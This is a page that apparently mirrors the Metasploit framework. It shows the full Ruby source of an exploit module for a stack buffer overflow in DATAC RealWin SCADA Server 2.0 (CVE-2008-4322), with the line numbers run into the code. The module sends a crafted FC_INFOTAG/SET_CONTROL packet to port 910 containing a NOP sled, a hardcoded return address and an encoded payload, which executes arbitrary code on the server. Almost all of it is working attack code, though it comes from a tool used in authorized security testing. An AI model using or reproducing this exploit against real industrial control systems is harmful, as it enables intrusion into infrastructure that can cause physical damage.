Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/scada/realwin.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'DATAC RealWin SCADA Server Buffer Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in DATAC Control15International RealWin SCADA Server 2.0 (Build 6.0.10.37).16By sending a specially crafted FC_INFOTAG/SET_CONTROL packet,17an attacker may be able to execute arbitrary code.18},19'Author' => [ 'MC' ],20'License' => MSF_LICENSE,21'References' =>22[23[ 'CVE', '2008-4322' ],24[ 'OSVDB', '48606' ],25[ 'BID', '31418' ],26],27'Privileged' => true,28'DefaultOptions' =>29{30'EXITFUNC' => 'thread',31},32'Payload' =>33{34'Space' => 550,35'BadChars' => "\x00\x20\x0a\x0d",36'StackAdjustment' => -3500,37},38'Platform' => 'win',39'Targets' =>40[41[ 'Universal', { 'Offset' => 740, 'Ret' => 0x4001e2a9 } ], # Thanks Jacopo!42],43'DefaultTarget' => 0,44'DisclosureDate' => '2008-09-26'))4546register_options([Opt::RPORT(910)])47end4849def exploit50connect5152data = [0x67542310].pack('V')53data << [0x00000800].pack('V')54data << [0x000a77e3].pack('V')55data << [0x00040005].pack('V')56data << "\x00\x00"57data << make_nops(target['Offset'])58data << [target.ret].pack('V')59data << [0x00404040].pack('V')60data << payload.encoded61data << make_nops(1024)6263print_status("Trying target #{target.name}...")64sock.get_once65sock.put(data)6667handler68disconnect69end70end717273